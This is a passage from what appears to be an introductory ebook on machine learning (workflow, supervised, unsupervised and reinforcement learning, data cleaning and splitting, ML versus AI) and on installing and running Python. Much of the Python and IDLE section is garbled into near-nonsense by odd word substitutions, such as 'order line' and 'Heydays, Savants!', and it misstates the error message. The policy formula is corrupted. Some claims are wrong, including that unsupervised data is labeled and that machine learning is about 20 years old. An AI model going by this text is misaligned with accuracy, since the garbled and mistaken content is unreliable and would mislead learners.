beings are not involved at all is completely false. Human beings are involved
in choosing and framing the problem, and in choosing the right training data.
The human being is also involved in the process of evaluating the
performance of the system. As we will see, there are tradeoffs that must be
made that have large implications for the viability of the system. If the data
scientists that are working on the problem are not careful and correct, to the
best of their abilities, in interpreting the results produced by the system, a
dysfunctional system can be deployed that will err when attempting to do its
job.
The training phase may have several iterations, depending on how the results
turn out.
Once the system is deployed, it will more or less operate in an autonomous
fashion, but data scientists that are involved in this work should be
continually evaluating the performance of the system. At some point, the
system may need to be replaced or it may need to be subjected to more
training, if it is not producing the kinds of results that are accepted.
Steps in Machine Learning
The data scientist must follow a certain procedure in order to implement
machine learning. We will learn the two different approaches that are used in
“training” the system. Machine learning involves artificial intelligence, and
so any system that has artificial intelligence is just like a human being, in that
the system needs to learn it’s skill before it goes out into the real world. It is
up to the data scientist to provide the training that the system needs.
Define the Problem
Each step in the machine learning paradigm is critical. If you make a mistake
early on, this is going to make the entire enterprise fall flat. When you say
artificial intelligence, while you get the impression that there is an all-
powerful computer, like the HAL 9000 system from 2001, the reality is a
little more down to earth.
It is true that there is not a specific, line by line set of instructions written in
code by human engineers that tell the computer what to do, and once a
machine learning system is deployed people might not really understand how
it’s working. Nonetheless, there is a lot of direct human involvement in the
process. And given our propensity to make mistakes, it’s important to be
careful at each step along the way. Think of yourself as a teacher guiding a
child so that they learn a new skill.
The first step is having a clear definition of the problem that you are facing.
The end goal must be in mind, so you must know what you expect the
machine learning system to do when it is up and running.
Gather and Prepare Data
The second step is to gather the data that is necessary to use in order to train
the system. If you define the problem but there is little or no data that can be
used to train it, then this procedure is not going to work. Machine learning
must have enough data so that the system can determine patterns and
relationships in the data that will allow it to make predictions and
classifications in the real world.
The assumption is going to be that enough data of the right type has been
collected. But simply having the data is not enough. As we will see, if you
simply feed the system raw data, this can create problems for a number of
reasons. So you will have to take a look at the data and apply some human
judgment to it. Think of data as consisting of a large number of fields or
properties. Are all of the properties relevant to the problem at hand?
In many cases, a machine learning system is going to find relationships
among different properties that do have a predictive value that humans will
miss–so there is a balancing act between cutting down the data versus
removing something that might be very important, even though it doesn’t
seem relevant to the human operator.
Nonetheless, you don’t want to have too much information in the data set that
can make it impossible to learn. So, you might have to discard some data to
reduce the complexity of the problem, if this is possible.
Choose the Style of Learning
These are going to be based on the nature of the problem and the type of data
that you have. This is an easy step in the process, since that will dictate the
style of learning used. The main types of learning are supervised learning,
unsupervised learning, semi-supervised learning, and representational
learning. We will learn what types of problems each type of learning is
suitable for and how the structure of the input data differs.
Select the Most Appropriate Algorithm
Once you have settled on whether or not the data and the problem you are
solving is best suited for supervised or unsupervised learning, then you need
to decide which algorithm to use. Certain situations might dictate whether
one algorithm is better than another algorithm. Choosing the right algorithm
might have an influence on the types of errors that you see in the results.
This means that as someone who is using machine learning, understanding
the main types of algorithms is going to be important.

Train and Test


Now at this point, everything is ready to go. The first step is to expose the
system to the training data so that it can learn. Then you will test the system
and evaluate.
Improve
When you evaluate the performance of the system with training and test data,
the error will need to be quantified. If the error is not acceptable, adjustments
may have to be made. As you would with regular coding, you can go through
a cycle of more training and making adjustments to reduce errors. In some
cases, you might have to scrap the system and start over, but one of the
benefits of machine learning is that the system is adaptive. The more data it
sees the better it learns. So, improvement may be possible by simply
exposing the system to more training data.
Deploy
Once the system is working to the degree that has an acceptable level of
error, then it is ready to be deployed.
Chapter 4 Types Of Machine Learning

In a world soaked in artificial intelligence, it is interesting to understand


machine learning in depth. This is a concept that allows an algorithm to
perform specific tasks without relying on any explicit instructions. Instead,
the machine relies on inference and patterns such that the user feeds data to a
generic algorithm rather than writing the code. In response, the machine
constructs the logic based on the input data. Usually, the accuracy of the
prediction made by the algorithm is evaluated and the algorithm only gets
deployed when the precision is acceptable.
Types of Machine Learning
There are three broad categories of machine learning. We will discuss each of
them in detail below.

1. Supervised Learning
This paradigm happens to be the most popular, probably because it is easy to
comprehend and execute. Here, the algorithm creates a mathematical concept
from a labeled dataset, i.e a dataset containing both the input and output
parameters. This dataset acts as a trainer to the model. Taking an example, we
may decide to use the algorithm to determine whether a particular image
contains a certain object. In this case, the dataset would comprise images with
and without the input (that object), with every image having the output
designating whether or not it contains the particular object. The algorithm is
likely to predict any answer; whether right or wrong. However, after several
attempts it gets trained on picking only the images containing the said object.
Once it gets totally trained, the algorithm starts making right predictions even
when new data is input. A perfect example of a supervised learning model is
a support vector machine. On the diagram below, the support vector machine
divides data into sections separated by a linear boundary. You realize the
boundary separates the white circles from the black.

Types of Supervised Learning


Classification: These algorithms are used in instances where the
outputs are limited to discrete values. In the case of filtering emails for
example, an incoming mail would be classified as the input, whereas
the output would be the folder name.
Regression: This is the algorithm under which the output has a
continuous value, which means they many pick on any value within a
given range. Perfect examples include; temperature, wind speed, price
of a commodity etc.
Supervised machine learning is exhibited in many common applications,
some of which we have discussed below.
➢ Advertisement Status: Most of the ads that you encounter when
browsing the internet are positioned there because a supervised learning
algorithm vouched for their clickability and popularity.
➢ Face Recognition: This one is quite common on Facebook. It is very
likely that your face has been used in a supervised algorithm that is trained to
recognize it. When Facebook is suggesting a tag you must have noted that the
system guesses the persons on the photo, which is a supervised process.
➢ Spam Classification: The spam filter that you find on your modern
email system is a supervised learning concept. Apart from preemptively
filtering spiteful emails, the system also allows the user to provide new labels
and express their preference. See the illustration on the figure below.
2. Unsupervised Learning
As the name suggests, unsupervised machine learning is the exact opposite of
supervised learning. The model finds structures in the data and also learns
through observation. When given a dataset, the model automatically finds
relationships and patterns by creating clusters in the dataset. The paradigm
cannot add labels to the created cluster, but it does the creation perfectly. This
means that if we have a set of apples and oranges, the model will separate the
apples from the oranges, but will not say that this is a set of oranges or
apples.
Now, suppose we had more than two sets, say we present images of grapes,
oranges, and apples. As explained above, the model, based on some
relationships and patterns, will create clusters and separate the datasets into
those clusters. Whenever new data is input, the model adds it to one of the
already built clusters as shown in the figure below. You realize the output is
grouped perfectly even without addition of labels.
Let us take another classical example for better understanding. Think of a
little baby and his family dog. He very well identifies its features. When a
family friend brings along another dog to try play with the baby, the baby
will identify that as a dog even without anyone telling them. They will easily
classify it because it has the features like two eyes, ears, walks on four,
among other details. This falls under unsupervised learning because you
classify the input data without being taught. If it were supervised learning,
the family friend would have to tell the baby that it’s a dog.
Types of Unsupervised Learning
Clustering: This concept identifies a pattern in an assortment of
unclassified data. Clustering algorithms categorize any existing natural
groups in the data. The user is also at liberty to adjust the number of
cluster they want their algorithms to identify. Under clustering there
are more types that you can utilize;
❖ Exclusive (partitioning)
Under this type, classification of data is done such that one data can only
belong to a single only. K-means serves as a perfect example.

❖ Agglomerative
This is the technique where every data is in itself a group. The number of
clusters is reduced by the iterative mergers between the two closest groups.
An example is the hierarchical clustering.
❖ Overlapping
Under this technique, data is associated with a suitable association value.
Fuzzy sets are used in grouping data and each point could fit into two or more
groups with different membership degrees. Fuzzy C-Means is a suitable
example under this type.
❖ Probabilistic
This concept creates clusters using probability distribution. See the example
below given some keywords;

“Men’s pants”
“Ladies’ pants”
“Men’s wallets”
“Ladies’ wallets”
The given keywords could be grouped into two; “pants” and “wallets” or
“Men” and “Ladies”.
Association
The rules under association allow the user to institute associations in the
midst of data objects inside big databases. As the name suggests, the
technique seeks to discover unique relations between variables contained in
large databases. For instance, shoppers could be grouped based on their
search and purchase histories.

Applications of Unsupervised Machine Learning


Unsupervised ML is based on data and its attributes, and Therefore, we can
conclude that it is data-driven. The results from a task are controlled by the
nature in which the data is formatted. Some of the common areas that rely on
unsupervised learning include but are not limited to;
➢ Buying Habits: It is not surprising to find your purchasing habits
stored in a database somewhere. The information could be used by marketers
to group clients into similar shopping segments so that they can reach out to
them easily. The clustering is easy to do under unsupervised learning
algorithms.
➢ Recommender Systems: If you are a Netflix or YouTube user you
might have encountered a video recommendation severally. Often times these
systems are contained in the unsupervised domain. The system knows the
watch history of its users. The model uses the history to identify relationships
between users who enjoy watching videos of certain genres, length, etc, and
prompt them with a suggestion of related videos that they may not have
watched.
➢ Identification of Fraudulent transactions: Anomaly detection is the
technique used in discovery of abnormal data points. The algorithm picks out
any unusual points within the data set, hence sending an alarm.
Supervised Vs. Unsupervised ML Techniques
Data specialists employ an array of machine algorithms in their discovery
operations. Below are some insights on the classification of supervised and
unsupervised learning techniques, which will help you to judge when to use
either of the techniques.
Parameters Supervised machine Unsupervised machine learning
learning
Data usage Employs training data to Does not use output data.
study the link between
the input and output.
Accuracy of Highly accurate reliable. Less accurate and Therefore, not
the outcome trustworthy
Input data Labeled data is used in Algorithms are used against
training the algorithms. unlabeled data.
Number of Known number of Unknown number of classes.
classes classes.
Major Classification of big Failure to get precise
drawback data. information concerning output
and data sorting due to use of
labeled and unknown data.
Real time Learning takes place Learning happens in real time.
learning offline.
Process Both input and output Only the input data is given.
variables are given.
Computational Relatively simple; less Complex in terms of
complexity complex. computation.
Deciding to employ a supervised or unsupervised machine learning algorithm
classically depends on your data volume and structure. Essentially, a well-
formed data science plan will employ both algorithm types to come up with
predictive data models. Now, these models are more advanced and help the
stakeholders in decision-making across a variety of business hold ups.

3. Reinforcement Learning
This is a neural network learning technique that trains machine learning
concepts how to make a progression of decisions. The agent is trained how to
attain their objective in an indecisive, potentially complex environment. In
this technique, an artificial intelligence engages into a game-like situation and
the computer tries to solve the problem using trial and error method. For the
programmer to get the machine to do what they want, the artificial
intelligence gets penalized or rewarded for the actions performed. The idea is
to fully exploit the total reward.
Usually there is a reward policy in form of game rules, but the designer does
not give any hints on how the model should solve the puzzle. The model
starts from completely random trials and advances to sophisticated
approaches and even superhuman skills. In the process, this technique
leverages the full power of search, hence qualifying to be the most effectual
in hinting machine’s creativity. As opposed to humans, artificial intelligence
can employ a reinforcement algorithm to collect experience from thousands
parallel gameplays as long as it is run on an adequately powerful computer
infrastructure.
Let us look at a practical example that will perfectly illustrate the
reinforcement learning technique. However, before then we need to
understand some terms that we will use in the illustration.
Agent: This is an implicit entity that seeks to gain a reward by
performing actions in an environment.
Environment (e): A situation that an agent must face.
Reward (R): An instant response given to an agent on performing a
specific action.
State (s): The current scenario returned by the environment.
Policy (π): An approach employed by the agent to determine their next
action based on the prevailing state.
Value (V): The projected long-term return, which is discounted
comparing with the short-lived reward.
Value Function: This one stipulates the total reward, i.e, the value of
a state.
Model based methods: Handles the reinforcement learning-based
problems that apply model-based techniques.
Model of the environment: It imitates the behavior of the
environment, helping you draw conclusions regarding environment
behavior.
Action value / Q value (Q): This is not very different from value. In
fact, the only variation is that this one takes an extra parameter as a
current action.
Illustration
Think of trying to teach your dog some new tricks. This dog does not
understand human language so you need to devise a strategy that will help
you achieve your goal. You will initiate a situation and observe the various
reactions by your dog. If the dog responds in the desired way, you give him
some beef. You will realize that every time you expose the dog to a similar
condition, they will tend to respond with greater enthusiasm hoping to get a
reward (the beef). It means that the positive experiences inspire the responses
your dog gives. As well, there are the negative experiences that teach the dog
what not to do because should they do it, then they will certainly miss their
share of beef.
In the given paradigm, your dog is an agent exposed to the environment. You
may decide to have your situation as requiring your sitting dog to walk when
you utter a particular word. This agent responds by performing an action
where they transition from one state to another, like transitioning from sitting
to walking. In this case, the policy is a process of choosing an action given a
state with the expectation of better results. After transitioning, the agent may
get a penalty or a reward in response.
Reinforcement Learning Algorithms
There are three techniques in implementation of a reinforcement learning
algorithm.
Value-based: here, the agent is anticipating a long-term return of the
prevailing states under policy and so you ought to maximize the value
function.
Policy-based: under this RL scheme you endeavor to find a policy
such that the action executed in each state leads to maximal reward in
the future.
Policy-based method is further classified into deterministic, where the policy
produces the same action for any state, and stochastic, where every action has
a definite probability determined by the stochastic policy. The stochastic
policy is n{a\s) = P\A, = a\S, =S]
Model-based: in this case you are expected to generate a virtual model
for every environment, where the agent learns how to perform in that
very environment.

Types of Reinforcement Learning


Positive
This is an event triggered by specific behavior. It positively influences the
action taken by the agent. This happens through enhancing the frequency and
strength of the behavior. This method helps you to capitalize on performance
and sustain change for a longer period. Even so, you have to be careful as
over-reinforcement may cause state over-optimization and impinge on the
results.
Negative
It involves strengthening behavior prompted by a negative condition which
should have been dodged or stopped. Although it helps define the least stand
performance, this method provides adequate to meet up the minimum
behavior, which is a drawback.
Applications of RL in Real Life
➢ Data processing and machine learning.
➢ Planning of business strategy.
➢ Robotics for industrial computerization.
➢ Aircraft and robot motion management.
➢ Helps in creation of customized training systems for students.
Summary

Data used in unsupervised learning is labeled and unknown,


and Therefore, you cannot get accurate information concerning
data sorting.
When moving from image to image you will have varied
information because the spectral properties of classes are also
likely to change over time.
Unsupervised machine learning locates all unknown types of
unidentified patterns in the data.
The user has to dedicate time to label and interpret the classes
which follow a particular classification.
The major downside of unsupervised learning is the failure to
get accurate information in regard to data sorting.
Reinforcement learning is a machine learning method with
three algorithms; 1) value-based, 2) policy-based and 3) model
based.
The two types of reinforcement learning are 1) positive and 2)
negative.
RL should not be used for problem-solving when you have
adequate data.
The major RL method drawback is that learning speed may be
affected by parameters.
Learning the Data sets of Python
When it comes to working with machine learning and the Python language,
there is nothing better than working with data. The more data that you are
able to gather and clean, the easier it is to work with some of the algorithms
that come with this process. You will find that Python is going to provide us
with many algorithms, but we first need to be able to organize the data and
get it set up to go through the algorithms for training and testing, in order to
see the results that we would like.
With this in mind, we need to take some time to explore the different types of
data that we are able to use. We have to look at some of the differences that
come up with unstructured and structured data when to use each one, and
how we can use these types of data in order to help us train and test some of
our Python machine learning algorithms.
Structured Data Sets
The first type of data that we need to spend time working with is structured
data. Traditionally we would just have this kind of data in the past, which
was harder to get but was easy to work with. Companies would look for some
of the structured data that they need, and then make some of the business
decisions and more that they need to move forward.
This kind of data is going to be any data that has been organized well and is
then going to fit into a formatted repository for us to use. Usually, this is
going to be data that is stored in a database so that the elements can be used
for more effective processing and analysis.
We may be able to find this kind of data when we are going through other
databases to help with the information, or when we get the results of a
survey. This one is much easier to work with because it is already organized,
and it is going to fit into the algorithm that you want to work with without
you have to worry about missing values, duplicates, outliers, or anything else
like this. It is also a much more expensive method of working with data,
which can make it harder to work with overall as well.
This is why many companies have to make a balancing act over how much-
structured data and how much-unstructured data they want to work with. The
structured data can make the work easier and will ensure that the algorithm is
going to work better, but it is harder to collect, there is less of it, and it is
more expensive. The unstructured data is sometimes hard to work with and
takes time to clean and organize, but there are endless amounts of it, it can
still be used to handle your machine learning algorithms, and it is a lot less
expensive to gather up and use.
Unstructured Data Sets
The second type of data that we need to take a look at is the unstructured
data. This is basically going to represent any of the data that doesn’t provide
us with a recognizable structure to it. It is going to be raw and unorganized,
and there may not be any rhyme or reason to what you are seeing.
Unstructured data is often going to be called loosely structured data in some
cases, where the sources of data may have some kind of structure, but not all
of the data in that set will end up following the same structure, so you will
still have some work to handle to make them work for your needs.
For those businesses that are going to center around the customer, the data
that is found in this kind of form can be examined and there is so much that
we are able to get out of it, such as using it to enhance the relationship
marketing and the customer relationship management that happens as well.
The development of unstructured data, as time goes on, is likely to keep
growing because more and more businesses are looking to gather this
information, and it can be gathered and created in no time at all.
Unstructured data is going to refer to any data that is able to follow a form
that is less ordered than items like a database, table, spreadsheets, and other
ordered sets of data. In fact, the term data set is going to be a good way to
look at this because it is going to be associated with data that is neat and
doesn’t have any extra content. We are basically working with a lot of data
that is not necessarily organized and can be hard to work with without some
help organizing.
There are a ton of instances where we are going to see this kind of data. We
may see it in documents, social media posts, medical records, books,
collaboration software, instant messages, presentations, and Word
documents, to name a few. We are able to work with some non-textual
unstructured data, and we will see that this can include video files JPEG
images and even some MP3 audio files as well.
Most of the data that you are going to work with over time will rely on the
idea of unstructured data. There is so much of this kind of data out there to
work with, and it is often easier to find and less expensive compared to some
of the structured data that we talked about above. Being prepared to handle
some of this unstructured data and make sure that it is prepared and ready to
go with some of your machine learning algorithms.
How to Manage the Missing Data
We also need to spend some time working with the missing data that comes
in. When we are gathering all of that data from all of those different sources,
it is likely that at least some of that data is going to come in missing. Whether
this is just one part of the data, or there are a lot of values that are missing for
entry, we need to know how we can manage these missing data points.
If we tried to push some of these missing data points through the chosen
algorithm, it would not end up going all that well. The algorithm may or may
not be able to handle some of the issues with the missing data and even if the
algorithm is able to handle the missing values, there could be issues with it
skewing the results. This is why it is important to choose which method you
would like to use when it is time to manage that missing data.
The method you choose will depend on the type and amount of missing data.
If you just have a few points that are missing, then it is probably fine to erase
those points and not worry about them at all. This can be the easiest method
to work with because you will be able to get them gone in no time. However,
for the most part, it is important to keep all of the data that you have, and
filling them in is a better way to manage the data.
There are a few ways that you are able to fill in the missing data. Usually,
going with the average or the mean of the rest of the data, is going to be a
good way to start. This ensures that you are still able to use the data that is
missing, while not losing out on some of the important parts that you need
with that entry as well. Find the standard that you want to use, and then fill in
those missing parts so that the data can work better with the algorithm that
we are using.
In addition to the missing data, we need to spend some time learning how to
manage the outliers and duplicate content. Both of these, if they are not taken
care of, is going to skew the results that you get. It is important to figure out
the best way to handle both of these before you move on.
To start, we have the outliers. If you have big outliers that are random but
really high or really low compared to the rest of the values, you will find that
it is going to mess with your results, and those results are not going to be as
accurate as you would like. If this is what happens with your data, then it is
probably best to just delete the outlier. It is just something that is not that
important, and removing it will ensure that you are able to handle the data in
an accurate manner.
Now, there are some situations where the outliers are going to be important,
as well. If you are looking at some of the outliers, and it looks like there are a
number of outliers that are going to fit into one cluster or group, then this
may be a sign that we need to move on to looking at these and using the
outliers. If you can see that a significant number of outliers are in this group,
rather than just one or two random outliers, then this could be a good sign
that there is a new option to work with for reaching customers, marketing, the
new product you want to release and more. It never hurts to take a look at
these outliers, but for many situations, you will want to delete these.
In addition, we need to focus on the duplicates. Many times we will want to
go through and delete the duplicates so that the answers don’t end up causing
any issues with the results that we have. If you have ten of the same person,
with all of the same information for them in your set of data, it is going to
skew your results.
If this happens a few times, the issue is going to get even worse overall. For
the most part, we want to go through and delete these enough so that we just
end up with no duplicates or at least a minimal amount of them.
Splitting Your Data
One thing that we will need to work on when it comes to our data is figuring
out how to split it up. There is some work that we have to do in order to
handle some of the data that we need before we can go through and add them
to the algorithms that we want to use. For example, we need to go through a
process of training and to test our algorithms to make sure they will work the
way that we want. This means that we need to split up the data that we have
into the training data and the testing data.
These two sets are important to making sure our algorithms are going to work
properly. Having them set up and using these sets in the proper manner will
help us to get the best results when it comes to working in machine learning.
The rules are pretty simple with this, though, so you will be able to get started
without any problems along the way.
For example, we need to make sure that the data we are using is high quality
to start with. If you do not have enough data or the data is not high in quality,
then your algorithm is going to get trained improperly, and will not work the
way that you want. Always be careful about the kind of data that you are
using in this process
Next, we need to make sure that we are splitting up the data properly. We
should have a group for testing and a group for training. Your training set
should be much larger to ensure that you are properly training the data that
you have and that the algorithm will get a good dose of the examples that you
present and what you want it to do.
Training and Testing Your Data
As we go through some of the processes with working on our data and these
algorithms, we have to make sure that we are training and testing all of the
algorithms first. You can’t just write a few lines of code and then put in your
data, hoping to get a good prediction to pop out. You need to take the time to
train and test the data through that algorithm, to ensure that the accuracy is
there, and to make sure that the algorithm is going to be ready for you to
work with.
The first step to this is going to be the training of your data. You have to
make sure that you are spending a good deal of time training your data so that
it knows the right way to behave. Out of the splitting of the data that we did
before; you want to have about 75 to 85 percent of your data be in the
training set. This ensures that you have enough data there that will help you
to really train the algorithm and gives it plenty of time to learn along the way
as well.
Then you can feed all of that training data through your algorithm and let it
have some time to form those connections and learn what it is supposed to
do. From there, you will then need to test the data that you are working with,
as well. This will be the rest of the data that you are working with. You can
feed this through the algorithm, and wait to see how much accuracy comes
back.
Keep in mind with this one that most of the time; these algorithms are going
to be able to learn by experience. This means that while they may not have as
high accuracy as you would like in the beginning, they will get better. In fact,
you may have to go through and do the training and testing phases a few
times in order to increase the accuracy enough that you will use the algorithm
to make predictions.
You want to get the accuracy as high as possible. However, if you are
noticing that the accuracy tends to be lower, and is going below 50 percent,
or is not improving as you do some iterations of the training and testing
phases, then this is a bad sign. It shows us that you either are not using
enough data in your training for the algorithm to properly learn, or you are
using bad data that is confusing the algorithm.
This is why we do the training and testing phases. It helps us to catch some of
the problems that may happen with this data and will allow us time to make
the necessary changes to the data and algorithm before we rely on the future
of our company using badly trained algorithms. We can make the
adjustments and run the phases again until the accuracy goes up, and we
know that we can rely on that data again.
Working with data is going to be a very big part of working with the machine
learning projects that we want to handle, we need to be able to learn how to
distinguish the different types of data, how to handle the missing data and the
outliers, and how to split up the data so that we are able to properly train and
test the algorithms that we want to use. When we are able to work with this,
we are going to see some great results through our machine learning, and we
will then be able to use these predictions and insights to help improve our
business.
Chapter 5 How Does Machine Learning Compare
to AI
One thing that we need to spend some time working on and understanding
before we move on is the difference between Artificial Intelligence and
Machine learning. Machine learning is going to do a lot of different tasks
when we look at the field of data science, and it also fits into the category of
artificial intelligence at the same time. But we have to understand that data
science is a pretty broad term, and there are going to be many concepts that
will fit into it. One of these concepts that fit under the umbrella of data
science is machine learning, but we will also see other terms that include big
data, data mining, and artificial intelligence. Data science is a newer field that
is growing more as people find more uses for computers and use these more
often.
Another thing that you can focus on when you bring out data science is the
field of statistics, and it is going to be put together often in machine learning.
You can work with the focus on classical statistics, even when you are at the
higher levels, sot that the data set will always stay consistent throughout the
whole thing. Of course, the different methods that you use to make this
happen will depend on the type of data that is put into this and how complex
the information that you are using gets as well.
This brings up the question here about the differences that show up between
machine learning and artificial intelligence and why they are not the same
thing. There are a lot of similarities that come with these two options, but the
major differences are what sets them apart, and any programmer who wants
to work with machine learning has to understand some of the differences that
show up. Let’s take some time here to explore the different parts of artificial
intelligence and machine learning so we can see how these are the same and
how they are different.
What is artificial intelligence?
The first thing we are going to take a look at is artificial intelligence or AI.
This is a term that was first brought about by a computer scientist named
John McCarthy in the 1950s. AI was first described as a method that you
would use for manufactured devices to learn how to copy the capabilities of
humans in regard to mental tasks.
However, the term has changed a bit in modern times, but you will find that
the basic idea is the same. When you implement AI, you are enabling
machines, such as computers, to operate and think just like the human brain
can. This is a benefit that means that these AI devices are going to be more
efficient at completing some tasks than the human brain.
At first glance, this may seem like AI is the same as machine learning, but
they are not exactly the same. Some people who don’t understand how these
two terms work can think that they are the same, but the way that you use
them in programming is going to make a big difference.
How is machine learning different?
Now that we have an idea of what artificial intelligence is all about, it is time
to take a look at machine learning and how this is the same as artificial
intelligence, and how this is different. When we look at machine learning, we
are going to see that this is actually a bit newer than a few of the other
options that come with data science as it is only about 20 years old. Even
though it has been around for a few decades so far, it has been in the past few
years that our technology and the machines that we have are finally able to
catch up to this and machine learning is being used more.
Machine learning is unique because it is a part of data science that is able to
focus just on having the program learn from the input, as well as the data that
the user gives to it. This is useful because the algorithm will be able to take
that information and make some good predictions about the future. Let’s look
at an example of using a search engine. For this to work, you would just need
to put in a term to a search query, and then the search engine would be able to
look through the information that is there to see what matches up with that
and returns some results.
The first few times that you do these search queries, it is likely that the results
will have something of interest, but you may have to go down the page a bit
in order to find the information that you want. But as you keep doing this, the
computer will take that information and learn from it in order to provide you
with choices that are better in the future. The first times, you may click on
like the sixth result, but over time, you may click on the first or second result
because the computer has learned what you find valuable.
With traditional programming, this is not something that your computer can
do on its own. Each person is going to do searches differently, and there are
millions of pages to sort through. Plus, each person who is doing their
searches online will have their own preferences for what they want to show
up. Conventional programming is going to run into issues when you try to do
this kind of task because there are just too many variables. Machine learning
has the capabilities to make it happen though.
Of course, this is just one example of how you are able to use machine
learning. In fact, machine learning can help you do some of these complex
problems that you want the computer to solve. Sometimes, you can solve
these issues with the human brain, but you will often find that machine
learning is more efficient and faster than what the human brain can do.
Of course, it is possible to have someone manually go through and do this for
you as well, but you can imagine that this would take too much time and be
an enormous undertaking. There is too much information, they may have no
idea where to even get started when it comes to sorting through it, the
information can confuse them, and by the time they get through it all, too
much time has passed and the information, as well as the predictions that
come out of it, are no longer relevant to the company at all.
Machine learning changes the game because it can keep up. The algorithms
that you are able to use with it are able to handle all of the work while getting
the results back that you need, in almost real-time. This is one of the big
reasons that businesses find that it is one of the best options to go with to help
them make good and sound decisions, to help them predict the future, and it
is a welcome addition to their business model.
Chapter 6 Hands on with Python
Installing Python (Windows)
Part of getting started with Python is installing the Python on your Windows.
For the first step of the installation, you will need to download the installation
package for your preferred version from this link below:
https://www.python.org/downloads/
Visiting this link, you will be directed to a page. On that page, you will need
to choose between the two latest versions for Python 2 and 3: Python 3.8.1
and Python 2.7.17.
In the other way round, if you are looking for a specific release, you can
explore the page to find download links for earlier versions. Normally, you
would opt to download the latest version, which is Python 3.8.1 –which was
released on October 14, 2019 –or you download the latest version of Python
2, 2.7.17. However, the version you download must be because of the kind of
project you want to do, compatibility and support for updates.
Once you’re finished with the download, you can proceed to installation by
clicking on the downloaded .exe file. A standard installation has to
incorporate pip, IDLE, and the essential documentation.
Installing Python (Mac)
If you’re using a Mac, you can download the installation package from this
link:
https://www.python.org/downloads/mac-osx/
The progression of learning is getting further into Python Programming
Language. In reality, Python is an adaptable yet powerful language that can
be used from multiple points of view. This just implies Python can be used
intelligently when code or a declaration is to be tried on a line-by-line
premise or when you're investigating its highlights. Incredibly, Python can be
used in content mode, most particularly, when you want to decipher a whole
document of declarations or application program.
Working with Python, be that as it may, requires most extreme caution –
particularly when you are drawing in or connecting with it. This caution is
valid for each programming language as well. So as to draw in with Python
intelligently, the Command Line window or the IDLE Development
Environment can be used.
Since you are an apprentice of either programming by and large or using
Python, there will shift ventures on how you could connect with and
cooperate with Python programming language. The following are basic
highlights of activities for brisk cooperation with Python:
The Command Line Interaction
Associating with the order line is the least difficult approach to work, as a
novice, with Python. Python can simply be imagined by seeing how it
functions through its reaction to each finished direction entered on the >>>
brief. The Command Line probably won't be the most favored commitment
with Python, at the same time, throughout the years, it has demonstrated to be
the easiest method to investigate how Python functions for learners.
Launching Python using the Command Line
If you're using macOS, GNU/Linux, and UNIX frameworks, you should run
the Terminal tool to get to the command line. Then again, if you are using
Windows, you can get to the Python order line by right-clicking on the Start
menu and launching Windows PowerShell.
As directions on programming require a contribution of an order, when you
need Python to do something for you, you will train it by entering directions
that it knows about a similar yield. This is an adjustment in the order may
give the ideal yield; be cautious.
With this, Python will make an interpretation of these directions to guidelines
that your PC or gadget can comprehend and execute.
Let’s take a look at certain guides to perceive how Python functions. Note
that you can use the print order to print the all-inclusive program
"Heydays, Savants!"
1. Above all else, open Python's command line.
2. At that point, at the >>>prompt, type the accompanying (don't leave space
among print and the section): print ("Heydays, Savants!")
3. Now, you should press enter so as to disclose to Python that you're finished
with the direction. Promptly, the direction line window will show Heydays,
Savants! In the interim, Python has reacted similarly as it has been told in the
composed arrangement that it can relate with. Then again, to perceive how it
will react wrongly when you request that it print a similar string using a
wrong linguistic structure for the print order, type and enter the
accompanying direction on the Python order brief: Print("Heydays,
Savants!")
The outcome will be: Syntax error: invalid language structure
This is a case of what get when you use invalid or fragmented explanations.
Note that Python is a case-touchy programming language, so at whatever
point you misunderstand the message it could be that you composed print
with a capital letter. Obviously, there is a choice to print direction, you can
simply type your announcement inside statements like this: "Primes,
Savants!" Note that an announcement is the words you wish to show once the
order is given; the words that can fit in are not confined to the model given
here, however.
The most effective method to leave the Python order line
To exit from Python, you can type any of these commands: quit() or exit().
Subsequently, hold Control-Z and afterward press Enter; the Python should
exit.
Your commonality with Python Programming ought to get fascinating now;
there are still parts to learn, tolerance will satisfy.
The area of IDLE: Python's Integrated Development Environment (IDE)
A standout amongst the fascinating pieces of Python is the IDLE (Integrated
Development and Learning Environment) apparatus. Despite the fact that this
specific device is incorporated into Python's establishment bundle, you can
download increasingly refined outsider IDEs as well. The IDLE instrument
gives you access to an increasingly effective stage to compose your code and
work engagingly with Python. To get to IDLE, you can experience a similar
organizer where you found the direction line symbol or on the begin menu (as
you've gained from order line collaboration). When you click on the IDLE
symbol, you will be coordinated to the Python Shell window. This will take
us to the segment on cooperation with the Python Shell Window.
Connecting with the Python Shell Window
When you're at the Python Shell Window, you will see a dropdown menu and
a >>>prompt that resembles what you've found in the direction line window
(the principal connection talked about). There is a specific IDLE's function of
altering for the drawing in past order. Now, you will use a similar IDLE's
altering menu to look back to your past directions, cut, copy, and glue past
statements and, taking all things together, make any type of editing. Clearly
the IDLE is increasingly similar to a jump from the direction line association.
Incredibly, in the menu dropdown of the Python Shell window are the
accompanying menu things: File, Windows, Help, Shell, Options, Edit, and
Debug. Every one of these menus has various functions. The Shell and
Debug menus are used while making bigger projects as they give get
highlights to the procedure. In any case, while the Shell menu gives you a
chance to restart the shell or look the shell's log for latest reset, Debug Menu
has loads of valuable things for following the source record of an exemption
and featuring the blundering line. With the Debugger option, you will most
likely introduce an intelligent debugger window that will enable you to step
and look through the running projects on the Python. The Options menu of
the window enables you to edit and set IDLE to suit your own Python
working inclinations.
Moreover, at the Help menu, you are opened to choice Python Help and
documentation.
Using the File Window menu, you will most likely make another document,
open a module, open an old record, as well as spare your session through the
essential things naturally made once you get to this menu. With the 'New File'
alternative, you will almost certainly make codes you should simply to tap on
it. When you have, you will be taken to another window with a
straightforward and standard word processor where you can type or alter your
code. You will see that the record is 'untitled' don't freeze this is the
underlying name of the document which will change when you spare your
code. One awesome thing about the File window menu is that refuse to have
both the 'Shell' and 'Menu' choices together, so the bar changes just somewhat
with the Shell Window. What happens is that in the Shell Window, two new
Menus have been presented, to be specific: the Run and the Format menus.
At whatever point you need to run the codes you have composed on the
record window, the yield will be given on the Shell Window individually.
Toward the start of this area, you're informed that Python can be used in the
Script Mode. How would you do this? The method of getting the outcome is
very extraordinary at this point. When working in content mode, the outcome
you will get won't be programmed as in the manner you would in connecting
with or associating mode. You should summon them out of your code. To get
your yield on this mode, run the content or order it through the print() work
inside your code.
To finish up this section, you've been taken through the essential two
methods of the Python Programming Language; the drawing in or associating
and the Script modes. Whatever the circumstance, realize that the
fundamental change in that one outcome is getting dependent on order while
the other is programmed.
Chapter 7 What is Python, and How Do I Use it?

We have spent some time talking about the Python coding language and
some of the neat things that you can do with this. However, to complete this
